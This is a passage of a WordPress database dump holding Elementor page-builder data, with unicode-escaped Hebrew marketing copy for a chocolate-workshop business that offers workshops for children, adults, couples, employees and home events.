\\u05d1\\u05d1\\u05d9\\u05ea\",\"description_text\":\"\\u05e1\\u05d3\\u05e0\\u05ea \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3 \\u05d1\\u05d1\\u05d9\\u05ea \\u05de\\u05ea\\u05d0\\u05d9\\u05de\\u05d4 \\u05dc\\u05db\\u05dc \\u05d0\\u05dc\\u05d5 \\u05d4\\u05de\\u05d7\\u05e4\\u05e9\\u05d9\\u05dd \\u05dc\\u05d4\\u05e4\\u05d9\\u05e7 \\u05d0\\u05d9\\u05e8\\u05d5\\u05e2 \\u05de\\u05d1\\u05dc\\u05d9 \\u05dc\\u05e6\\u05d0\\u05ea \\u05de\\u05d4\\u05d1\\u05d9\\u05ea. \\u05e1\\u05d3\\u05e0\\u05ea \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3 \\u05de\\u05d4\\u05d1\\u05d9\\u05ea \\u05de\\u05ea\\u05d0\\u05d9\\u05de\\u05d4 \\u05dc\\u05d9\\u05de\\u05d9 \\u05d4\\u05d5\\u05dc\\u05d3\\u05ea, \\u05e2\\u05e8\\u05d1\\u05d9 \\u05d2\\u05d9\\u05d1\\u05d5\\u05e9, \\u05d4\\u05e6\\u05e2\\u05ea \\u05e0\\u05d9\\u05e9\\u05d5\\u05d0\\u05d9\\u05df, \\u05d7\\u05d5\\u05d5\\u05d9\\u05d4 \\u05de\\u05e9\\u05e4\\u05d7\\u05ea\\u05d9\\u05ea, \\u05e1\\u05d3\\u05e0\\u05ea \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3 \\u05d6\\u05d5\\u05d2\\u05d9\\u05ea \\u05d5\\u05e2\\u05d5\\u05d3. \\u05d4\\u05e6\\u05d9\\u05d5\\u05d3 \\u05e2\\u05dc\\u05d9\\u05e0\\u05d5, \\u05dc\\u05db\\u05dd \\u05e0\\u05e9\\u05d0\\u05e8 \\u05e8\\u05e7 \\u05dc\\u05d9\\u05d4\\u05e0\\u05d5\\u05ea\",\"image_space\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"image_size\":{\"unit\":\"%\",\"size\":55,\"sizes\":[]},\"title_bottom_space\":{\"unit\":\"px\",\"size\":5,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"image-box\"}],\"isInner\":false}],\"isInner\":false}]'),(2210,423,'_elementor_edit_mode','builder'),(2211,423,'_elementor_template_type','wp-page'),(2212,423,'_elementor_version','2.7.5'),(2213,423,'_elementor_pro_version','2.7.3'),(2214,423,'_wp_page_template','elementor_header_footer'),(2215,423,'_elementor_page_settings','a:1:{s:10:\"hide_title\";s:3:\"yes\";}'),(2216,423,'_elementor_data','[{\"id\":\"e02bb57\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"c37663b\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"9a95b77\",\"elType\":\"widget\",\"settings\":{\"title\":\"\\u05e1\\u05d3\\u05e0\\u05d0\\u05d5\\u05ea \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3\"},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"1b21e8f\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"d18fa46\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"2529b3d\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>\\u05d0\\u05d9\\u05d6\\u05d4 \\u05d8\\u05d9\\u05e4\\u05d5\\u05e1\\u05d9\\u05dd \\u05d0\\u05ea\\u05dd? \\u05de\\u05e8\\u05d9\\u05e8, \\u05d7\\u05dc\\u05d1 \\u05d0\\u05d5 \\u05dc\\u05d1\\u05df? \\u05db\\u05df \\u05d4\\u05db\\u05d5\\u05d5\\u05e0\\u05d4 \\u05dc\\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3 \\u05e9\\u05d0\\u05ea\\u05dd \\u05d1\\u05d3\\u05e8\\u05da \\u05db\\u05dc \\u05d0\\u05d5\\u05d4\\u05d1\\u05d9\\u05dd \\u05dc\\u05d0\\u05db\\u05d5\\u05dc. \\u05db\\u05de\\u05e2\\u05d8 \\u05db\\u05d5\\u05dc\\u05dd \\u05d0\\u05d5\\u05d4\\u05d1\\u05d9\\u05dd \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3, \\u05de\\u05ea\\u05d7\\u05d1\\u05e8\\u05d9\\u05dd \\u05dc\\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3, \\u05d5\\u05e0\\u05d4\\u05e0\\u05d9\\u05dd \\u05dc\\u05e6\\u05e8\\u05d5\\u05da \\u05d0\\u05d5\\u05ea\\u05d5 \\u05e2\\u05dc \\u05d1\\u05e1\\u05d9\\u05e1 \\u05e7\\u05d1\\u05d5\\u05e2. \\u05d1\\u05d9\\u05df \\u05d0\\u05dd \\u05de\\u05d3\\u05d5\\u05d1\\u05e8 \\u05d1\\u05e4\\u05e8\\u05dc\\u05d9\\u05e0\\u05d9\\u05dd \\u05de\\u05d9\\u05d5\\u05d7\\u05d3\\u05d9\\u05dd, \\u05d1\\u05e7\\u05d9\\u05e0\\u05d5\\u05d7\\u05d9\\u05dd \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3\\u05d9\\u05d9\\u05dd, \\u05d1\\u05e2\\u05d5\\u05d2\\u05d5\\u05ea \\u05d0\\u05d5 \\u05d1\\u05e2\\u05d5\\u05d2\\u05d9\\u05d5\\u05ea, \\u05d1\\u05d2\\u05dc\\u05d9\\u05d3\\u05ea \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3 \\u05d8\\u05e2\\u05d9\\u05de\\u05d4, \\u05d5\\u05d2\\u05dd \\u05d1\\u05d8\\u05d1\\u05dc\\u05ea \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3 \\u05e4\\u05e9\\u05d5\\u05d8\\u05d4 \\u05e9\\u05e7\\u05e0\\u05d9\\u05ea\\u05dd \\u05dc\\u05d0\\u05d7\\u05e8\\u05d5\\u05e0\\u05d4 \\u05d1\\u05e1\\u05d5\\u05e4\\u05e8. \\u05dc\\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3 \\u05d9\\u05e9 \\u05d9\\u05db\\u05d5\\u05dc\\u05ea \\u05dc\\u05d4\\u05e2\\u05dc\\u05d5\\u05ea \\u05d0\\u05ea \\u05de\\u05e6\\u05d1 \\u05d4\\u05e8\\u05d5\\u05d7, \\u05dc\\u05e9\\u05de\\u05d7 \\u05d5\\u05dc\\u05e8\\u05d5\\u05de\\u05dd, \\u05d5\\u05d1\\u05e2\\u05d9\\u05e7\\u05e8 \\u05dc\\u05e2\\u05e9\\u05d5\\u05ea \\u05dc\\u05e0\\u05d5 \\u05d8\\u05e2\\u05d9\\u05dd \\u05d5\\u05d8\\u05d5\\u05d1 \\u05e2\\u05dc \\u05d4\\u05dc\\u05d1.<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"528c897\",\"elType\":\"section\",\"settings\":{\"structure\":\"30\"},\"elements\":[{\"id\":\"f245b9c\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"1d4f8d7\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/www.chocolate4u.co.il\\/wp-content\\/uploads\\/2019\\/12\\/Depositphotos_23615471_s-2019-1.jpg\",\"id\":411},\"title_text\":\"\\u05e1\\u05d3\\u05e0\\u05ea \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3 \\u05dc\\u05d9\\u05dc\\u05d3\\u05d9\\u05dd\",\"description_text\":\"\\u05e1\\u05d3\\u05e0\\u05ea \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3 \\u05dc\\u05d9\\u05dc\\u05d3\\u05d9\\u05dd \\u05de\\u05ea\\u05d0\\u05d9\\u05de\\u05d4 \\u05dc\\u05db\\u05dc \\u05d0\\u05d9\\u05e8\\u05d5\\u05e2 \\u05d0\\u05d5 \\u05de\\u05e1\\u05d9\\u05d1\\u05d4. \\u05ea\\u05e2\\u05e1\\u05d5\\u05e7\\u05d4 \\u05dc\\u05d9\\u05de\\u05d9 \\u05d4\\u05d7\\u05d5\\u05e4\\u05e9, \\u05e1\\u05d3\\u05e0\\u05ea \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3 \\u05dc\\u05d9\\u05d5\\u05dd \\u05d4\\u05d5\\u05dc\\u05d3\\u05ea \\u05d0\\u05d5 \\u05e1\\u05ea\\u05dd \\u05d0\\u05d9\\u05d7\\u05d5\\u05d3 \\u05de\\u05e9\\u05e4\\u05d7\\u05ea\\u05d9. \\u05dc\\u05db\\u05dc \\u05de\\u05e7\\u05e8\\u05d4, \\u05de\\u05d3\\u05d5\\u05d1\\u05e8 \\u05d1\\u05d7\\u05d5\\u05d5\\u05d9\\u05d4 \\u05e9\\u05dc\\u05e2\\u05d5\\u05dc\\u05dd \\u05dc\\u05d0 \\u05ea\\u05d9\\u05e9\\u05db\\u05d7.\",\"image_space\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"image_size\":{\"unit\":\"%\",\"size\":55,\"sizes\":[]},\"title_bottom_space\":{\"unit\":\"px\",\"size\":5,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"image-box\"}],\"isInner\":false},{\"id\":\"59b08ef\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"661603b\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/www.chocolate4u.co.il\\/wp-content\\/uploads\\/2019\\/12\\/Depositphotos_243662986_s-2019-1.jpg\",\"id\":413},\"title_text\":\"\\u05e1\\u05d3\\u05e0\\u05ea \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3 \\u05dc\\u05de\\u05d1\\u05d5\\u05d2\\u05e8\\u05d9\\u05dd\",\"description_text\":\"\\u05db\\u05d9 \\u05d0\\u05d9\\u05df \\u05d2\\u05d9\\u05dc \\u05dc\\u05e9\\u05e7\\u05d5\\u05dc\\u05d3. \\u05d2\\u05dd \\u05dc\\u05e0\\u05d5 \\u05d4\\u05de\\u05d1\\u05d5\\u05d2\\u05e8\\u05d9\\u05dd \\u05de\\u05d5\\u05ea\\u05e8 \\u05dc\\u05d9\\u05d4\\u05e0\\u05d5\\u05ea \\u05de\\u05e1\\u05d3\\u05e0\\u05ea \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3 \\u05d7\\u05d5\\u05d5\\u05d9\\u05ea\\u05d9\\u05ea \\u05d1\\u05d4 \\u05e0\\u05db\\u05d9\\u05df \\u05d3\\u05d1\\u05e8\\u05d9\\u05dd \\u05de\\u05d9\\u05d5\\u05d7\\u05d3\\u05d9\\u05dd, \\u05e0\\u05d8\\u05e2\\u05dd \\u05d5\\u05e0\\u05dc\\u05de\\u05d3 \\u05e2\\u05dc \\u05d4\\u05d3\\u05d1\\u05e8 \\u05d4\\u05de\\u05d5\\u05e9\\u05dc\\u05dd \\u05d4\\u05d6\\u05d4 \\u05e9\\u05e0\\u05e7\\u05e8\\u05d0 \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3.\",\"image_space\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"image_size\":{\"unit\":\"%\",\"size\":55,\"sizes\":[]},\"title_bottom_space\":{\"unit\":\"px\",\"size\":5,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"image-box\"}],\"isInner\":false},{\"id\":\"4b95460\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"c0c0b4f\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/www.chocolate4u.co.il\\/wp-content\\/uploads\\/2019\\/12\\/Depositphotos_62137823_s-2019-1.jpg\",\"id\":414},\"title_text\":\"\\u05e1\\u05d3\\u05e0\\u05ea \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3 \\u05d6\\u05d5\\u05d2\\u05d9\\u05ea\",\"description_text\":\" \\u05e1\\u05d3\\u05e0\\u05ea \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3 \\u05d6\\u05d5\\u05d2\\u05d9\\u05ea \\u05e0\\u05d5\\u05e2\\u05d3\\u05d4 \\u05dc\\u05d0\\u05dc\\u05d5 \\u05d4\\u05de\\u05d7\\u05e4\\u05e9\\u05d9\\u05dd \\u05d7\\u05d5\\u05d5\\u05d9\\u05d4 \\u05de\\u05e7\\u05d5\\u05e8\\u05d9\\u05ea \\u05d5\\u05d9\\u05d9\\u05d7\\u05d5\\u05d3\\u05d9\\u05ea \\u05e9\\u05dc\\u05d0 \\u05d9\\u05e9\\u05db\\u05d7\\u05d5 \\u05dc\\u05e2\\u05d5\\u05dc\\u05dd. \\u05e1\\u05d3\\u05e0\\u05ea \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3 \\u05dc\\u05d6\\u05d5\\u05d2\\u05d5\\u05ea \\u05de\\u05ea\\u05d0\\u05d9\\u05de\\u05d4 \\u05d2\\u05dd \\u05db\\u05de\\u05ea\\u05e0\\u05d4 \\u05d0\\u05d5 \\u05db\\u05d4\\u05e6\\u05e2\\u05ea \\u05e0\\u05d9\\u05e9\\u05d5\\u05d0\\u05d9\\u05df \\u05d5\\u05e0\\u05d9\\u05ea\\u05df \\u05dc\\u05e2\\u05e8\\u05d5\\u05da \\u05d0\\u05d5\\u05ea\\u05d4 \\u05d1\\u05db\\u05dc \\u05de\\u05e7\\u05d5\\u05dd \\u05e9\\u05ea\\u05e8\\u05e6\\u05d5.\",\"image_space\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"image_size\":{\"unit\":\"%\",\"size\":55,\"sizes\":[]},\"title_bottom_space\":{\"unit\":\"px\",\"size\":5,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"image-box\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"7b7ce5f\",\"elType\":\"section\",\"settings\":{\"structure\":\"30\"},\"elements\":[{\"id\":\"5817cff\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"7a1d0cb\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/www.chocolate4u.co.il\\/wp-content\\/uploads\\/2019\\/12\\/Depositphotos_53956819_s-2019-1.jpg\",\"id\":416},\"title_text\":\"\\u05e1\\u05d3\\u05e0\\u05ea \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3 \\u05dc\\u05de\\u05e1\\u05d9\\u05d1\\u05ea \\u05e8\\u05d5\\u05d5\\u05e7\\u05d5\\u05ea\",\"description_text\":\"\\u05d4\\u05d7\\u05d1\\u05e8\\u05d4 \\u05d4\\u05db\\u05d9 \\u05d8\\u05d5\\u05d1\\u05d4 \\u05de\\u05ea\\u05d7\\u05ea\\u05e0\\u05ea \\u05d5\\u05d0\\u05ea \\u05de\\u05d0\\u05e8\\u05d2\\u05e0\\u05ea \\u05dc\\u05d4 \\u05d0\\u05ea \\u05d4\\u05d0\\u05d8\\u05e8\\u05e7\\u05e6\\u05d9\\u05d4 \\u05dc\\u05de\\u05e1\\u05d9\\u05d1\\u05d4. \\u05e0\\u05db\\u05d5\\u05df, \\u05e0\\u05de\\u05d0\\u05e1 \\u05de\\u05db\\u05dc \\u05d4\\u05d4\\u05e4\\u05e2\\u05dc\\u05d5\\u05ea \\u05d4\\u05e0\\u05d3\\u05d5\\u05e9\\u05d5\\u05ea \\u05d5\\u05d4\\u05d2\\u05d9\\u05e2 \\u05d4\\u05d6\\u05de\\u05df \\u05dc\\u05d7\\u05d3\\u05e9. \\u05e1\\u05d3\\u05e0\\u05ea \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3 \\u05dc\\u05de\\u05e1\\u05d9\\u05d1\\u05ea \\u05e8\\u05d5\\u05d5\\u05e7\\u05d5\\u05ea \\u05e0\\u05d5\\u05e2\\u05d3\\u05d4 \\u05e2\\u05d1\\u05d5\\u05e8 \\u05d0\\u05dc\\u05d5 \\u05d4\\u05de\\u05d7\\u05e4\\u05e9\\u05d5\\u05ea  \\u05dc\\u05d2\\u05d5\\u05d5\\u05df  \\u05d0\\u05ea \\u05d4\\u05d4\\u05e4\\u05e2\\u05dc\\u05d5\\u05ea \\u05d4\\u05e9\\u05d2\\u05e8\\u05ea\\u05d9\\u05d5\\u05ea \\u05d5\\u05de\\u05d1\\u05d8\\u05d9\\u05d7\\u05d4 \\u05d7\\u05d5\\u05d5\\u05d9\\u05d9\\u05d4 \\u05d1\\u05dc\\u05ea\\u05d9 \\u05e0\\u05e9\\u05db\\u05ea \\u05dc\\u05db\\u05dc\\u05d4 \\u05dc\\u05e2\\u05ea\\u05d9\\u05d3 \\u05d5\\u05dc\\u05db\\u05dc \\u05d4\\u05d7\\u05d1\\u05e8\\u05d5\\u05ea \\u05d4\\u05de\\u05e9\\u05ea\\u05ea\\u05e4\\u05d5\\u05ea\",\"image_space\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"image_size\":{\"unit\":\"%\",\"size\":55,\"sizes\":[]},\"title_bottom_space\":{\"unit\":\"px\",\"size\":5,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"image-box\"}],\"isInner\":false},{\"id\":\"ce1b43d\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"23fa8d2\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/www.chocolate4u.co.il\\/wp-content\\/uploads\\/2019\\/12\\/Depositphotos_247319794_s-2019-1.jpg\",\"id\":418},\"title_text\":\"\\u05e1\\u05d3\\u05e0\\u05ea \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3 \\u05dc\\u05e2\\u05d5\\u05d1\\u05d3\\u05d9\\u05dd \\u05d5\\u05d7\\u05d1\\u05e8\\u05d5\\u05ea\",\"description_text\":\"\\u05e1\\u05d3\\u05e0\\u05ea \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3 \\u05dc\\u05e2\\u05d5\\u05d1\\u05d3\\u05d9\\u05dd \\u05de\\u05d9\\u05d5\\u05e2\\u05d3\\u05ea \\u05e2\\u05d1\\u05d5\\u05e8 \\u05d0\\u05dc\\u05d5 \\u05d4\\u05de\\u05d7\\u05e4\\u05e9\\u05d9\\u05dd \\u05d9\\u05d5\\u05dd \\u05d2\\u05d9\\u05d1\\u05d5\\u05e9 \\u05d0\\u05d5 \\u05e2\\u05e8\\u05d1 \\u05d2\\u05d9\\u05d1\\u05d5\\u05e9 \\u05db\\u05d9\\u05d9\\u05e4\\u05d9 \\u05d5\\u05de\\u05e7\\u05d5\\u05e8\\u05d9 \\u05d1\\u05de\\u05d9\\u05d5\\u05d7\\u05d3. \\u05e1\\u05d3\\u05e0\\u05ea \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3 \\u05dc\\u05e2\\u05d5\\u05d1\\u05d3\\u05d9\\u05dd \\u05de\\u05d2\\u05d1\\u05e9\\u05ea, \\u05de\\u05e8\\u05d2\\u05e9\\u05ea \\u05d5\\u05d1\\u05dc\\u05ea\\u05d9 \\u05e0\\u05e9\\u05db\\u05d7\\u05ea.\",\"image_space\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"image_size\":{\"unit\":\"%\",\"size\":55,\"sizes\":[]},\"title_bottom_space\":{\"unit\":\"px\",\"size\":5,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"image-box\"}],\"isInner\":false},{\"id\":\"3a32e3a\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"a0f0677\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/www.chocolate4u.co.il\\/wp-content\\/uploads\\/2019\\/12\\/Depositphotos_72660625_s-2019-1.jpg\",\"id\":420},\"title_text\":\"\\u05e1\\u05d3\\u05e0\\u05ea \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3 \\u05d1\\u05d1\\u05d9\\u05ea\",\"description_text\":\"\\u05e1\\u05d3\\u05e0\\u05ea \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3 \\u05d1\\u05d1\\u05d9\\u05ea \\u05de\\u05ea\\u05d0\\u05d9\\u05de\\u05d4 \\u05dc\\u05db\\u05dc \\u05d0\\u05dc\\u05d5 \\u05d4\\u05de\\u05d7\\u05e4\\u05e9\\u05d9\\u05dd \\u05dc\\u05d4\\u05e4\\u05d9\\u05e7 \\u05d0\\u05d9\\u05e8\\u05d5\\u05e2 \\u05de\\u05d1\\u05dc\\u05d9 \\u05dc\\u05e6\\u05d0\\u05ea \\u05de\\u05d4\\u05d1\\u05d9\\u05ea. \\u05e1\\u05d3\\u05e0\\u05ea \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3 \\u05de\\u05d4\\u05d1\\u05d9\\u05ea \\u05de\\u05ea\\u05d0\\u05d9\\u05de\\u05d4 \\u05dc\\u05d9\\u05de\\u05d9 \\u05d4\\u05d5\\u05dc\\u05d3\\u05ea, \\u05e2\\u05e8\\u05d1\\u05d9 \\u05d2\\u05d9\\u05d1\\u05d5\\u05e9, \\u05d4\\u05e6\\u05e2\\u05ea \\u05e0\\u05d9\\u05e9\\u05d5\\u05d0\\u05d9\\u05df, \\u05d7\\u05d5\\u05d5\\u05d9\\u05d4 \\u05de\\u05e9\\u05e4\\u05d7\\u05ea\\u05d9\\u05ea, \\u05e1\\u05d3\\u05e0\\u05ea \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3 \\u05d6\\u05d5\\u05d2\\u05d9\\u05ea \\u05d5\\u05e2\\u05d5\\u05d3. \\u05d4\\u05e6\\u05d9\\u05d5\\u05d3 \\u05e2\\u05dc\\u05d9\\u05e0\\u05d5, \\u05dc\\u05db\\u05dd \\u05e0\\u05e9\\u05d0\\u05e8 \\u05e8\\u05e7 \\u05dc\\u05d9\\u05d4\\u05e0\\u05d5\\u05ea\",\"image_space\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"image_size\":{\"unit\":\"%\",\"size\":55,\"sizes\":[]},\"title_bottom_space\":{\"unit\":\"px\",\"size\":5,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"image-box\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"4f4d3ed\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"174e916\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"d555ad1\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h2>\\u05e1\\u05d3\\u05e0\\u05d0\\u05d5\\u05ea \\u05e9\\u05d5\\u05e7\\u05dc\\u05d3, \\u05dc\\u05dc\\u05de\\u05d5\\u05d3 \\u05e2\\u05dc \\u05d7\\u05d5\\u05de\\u05e8 \\u05d4\\u05d2\\u05dc\\u05dd \\u05d4\\u05d8\\u05e2\\u05d9\\u05dd \\u05d1\\u05e2\\u05d5\\u05dc\\u05dd<\\/h2><p>\\u05e8\\u05d1\\u05d9\\u05dd \\u05d0\\u05d5\\u05d4\\u05d1\\u05d9\\u05dd \\u05de\\u05d0\\u05d5\\u05d3 \\u05dc\\u05d0\\u05db\\u05d5\\u05dc \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3 \\u05e2\\u05dc \\u05d1\\u05e1\\u05d9\\u05e1 \\u05d9\\u05d5\\u05de\\u05d9 \\u05d5\\u05e0\\u05d4\\u05e0\\u05d9\\u05dd \\u05de\\u05d4\\u05d8\\u05e2\\u05dd \\u05d4\\u05de\\u05ea\\u05d5\\u05e7 \\u05e2\\u05dc \\u05d4\\u05dc\\u05e9\\u05d5\\u05df. \\u05d7\\u05dc\\u05e7 \\u05dc\\u05d0 \\u05e7\\u05d8\\u05df \\u05de\\u05e2\\u05d5\\u05e0\\u05d9\\u05d9\\u05df \\u05d3\\u05d5\\u05d5\\u05e7\\u05d0 \\u05dc\\u05d3\\u05e2\\u05ea \\u05d0\\u05d9\\u05da \\u05dc\\u05e2\\u05d1\\u05d5\\u05d3 \\u05d1\\u05e6\\u05d5\\u05e8\\u05d4 \\u05e0\\u05db\\u05d5\\u05e0\\u05d4 \\u05e2\\u05dd \\u05d7\\u05d5\\u05de\\u05e8 \\u05d4\\u05d2\\u05dc\\u05dd \\u05d4\\u05d9\\u05d5\\u05e7\\u05e8\\u05ea\\u05d9 \\u05d4\\u05d6\\u05d4, \\u05de\\u05d4 \\u05d4\\u05d3\\u05e8\\u05da \\u05d4\\u05db\\u05d9 \\u05d8\\u05d5\\u05d1\\u05d4 \\u05dc\\u05e9\\u05dc\\u05d1 \\u05d0\\u05d5\\u05ea\\u05d5 \\u05d1\\u05e7\\u05d9\\u05e0\\u05d5\\u05d7\\u05d9\\u05dd, \\u05d0\\u05d9\\u05da \\u05d4\\u05db\\u05d9 \\u05e0\\u05db\\u05d5\\u05df \\u05dc\\u05d8\\u05de\\u05e4\\u05e8\\u05e8 \\u05d0\\u05d5\\u05ea\\u05d5 \\u05d5\\u05dc\\u05d9\\u05e6\\u05d5\\u05e8 \\u05de\\u05de\\u05e0\\u05d5 \\u05d9\\u05e6\\u05d9\\u05e8\\u05d5\\u05ea \\u05d9\\u05e4\\u05d9\\u05e4\\u05d9\\u05d5\\u05ea, \\u05d5\\u05d2\\u05dd \\u05de\\u05d4 \\u05d4\\u05d3\\u05e8\\u05db\\u05d9\\u05dd \\u05d4\\u05db\\u05d9 \\u05d8\\u05d5\\u05d1\\u05d5\\u05ea \\u05dc\\u05d8\\u05e4\\u05dc \\u05d1\\u05d5 \\u05d1\\u05e6\\u05d5\\u05e8\\u05d4 \\u05e9\\u05ea\\u05d5\\u05e6\\u05d9\\u05d0 \\u05de\\u05de\\u05e0\\u05d5 \\u05d0\\u05ea \\u05d4\\u05d0\\u05e8\\u05d5\\u05de\\u05d5\\u05ea \\u05d4\\u05d8\\u05d5\\u05d1\\u05d5\\u05ea \\u05d1\\u05d9\\u05d5\\u05ea\\u05e8 \\u05e9\\u05d9\\u05ea\\u05e8\\u05de\\u05d5 \\u05dc\\u05d8\\u05e2\\u05dd \\u05d4\\u05db\\u05dc\\u05dc\\u05d9 \\u05e9\\u05dc \\u05d4\\u05e7\\u05d9\\u05e0\\u05d5\\u05d7. <br \\/><span style=\\\"color: #ff0000;\\\">\\u05e1\\u05d3\\u05e0\\u05ea \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3 \\u05d1\\u05d9\\u05ea\\u05d9\\u05ea \\u05d4\\u05d9\\u05d0 \\u05d4\\u05d3\\u05e8\\u05da \\u05d4\\u05d8\\u05d5\\u05d1\\u05d4 \\u05d1\\u05d9\\u05d5\\u05ea\\u05e8 \\u05dc\\u05e2\\u05e9\\u05d5\\u05ea \\u05d6\\u05d0\\u05ea.<\\/span><\\/p><h2>\\u05e1\\u05d3\\u05e0\\u05ea \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3 \\u05d1\\u05d1\\u05d9\\u05ea, \\u05de\\u05d4 \\u05d6\\u05d4 \\u05d0\\u05d5\\u05de\\u05e8?<\\/h2><p>\\u05dc\\u05de\\u05e2\\u05e9\\u05d4 \\u05de\\u05d3\\u05d5\\u05d1\\u05e8 \\u05d1\\u05e1\\u05d3\\u05e0\\u05ea \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3 \\u05d9\\u05d9\\u05d7\\u05d5\\u05d3\\u05d9\\u05ea \\u05d5\\u05d8\\u05e2\\u05d9\\u05de\\u05d4 \\u05e9\\u05ea\\u05d5\\u05db\\u05dc\\u05d5 \\u05dc\\u05e2\\u05e9\\u05d5\\u05ea \\u05d0\\u05e6\\u05dc\\u05db\\u05dd \\u05d1\\u05d1\\u05d9\\u05ea. <br \\/>\\u05db\\u05dc \\u05e1\\u05d3\\u05e0\\u05d4 \\u05de\\u05d5\\u05ea\\u05d0\\u05de\\u05ea \\u05dc\\u05de\\u05d0\\u05d5\\u05e8\\u05e2, \\u05dc\\u05d0\\u05d5\\u05e4\\u05d9 \\u05d4\\u05de\\u05e9\\u05ea\\u05ea\\u05e4\\u05d9\\u05dd \\u05d5\\u05dc\\u05db\\u05de\\u05d5\\u05ea \\u05d4\\u05de\\u05e9\\u05ea\\u05ea\\u05e4\\u05d9\\u05dd \\u05d1\\u05e1\\u05d3\\u05e0\\u05d4 \\u05e2\\u05e6\\u05de\\u05d4 (\\u05dc\\u05de\\u05e9\\u05dc, \\u05e0\\u05d9\\u05ea\\u05df \\u05dc\\u05e2\\u05e8\\u05d5\\u05da \\u05d1\\u05d1\\u05d9\\u05ea \\u05e1\\u05d3\\u05e0\\u05ea \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3 \\u05dc\\u05d6\\u05d5\\u05d2\\u05d5\\u05ea, \\u05e1\\u05d3\\u05e0\\u05ea \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3 \\u05de\\u05e9\\u05e4\\u05d7\\u05ea\\u05d9\\u05ea, \\u05dc\\u05de\\u05d1\\u05d5\\u05d2\\u05e8\\u05d9\\u05dd \\u05d5\\u05e2\\u05d5\\u05d3), \\u05d1\\u05db\\u05dc \\u05e1\\u05d3\\u05e0\\u05d4 \\u05ea\\u05d5\\u05db\\u05dc\\u05d5 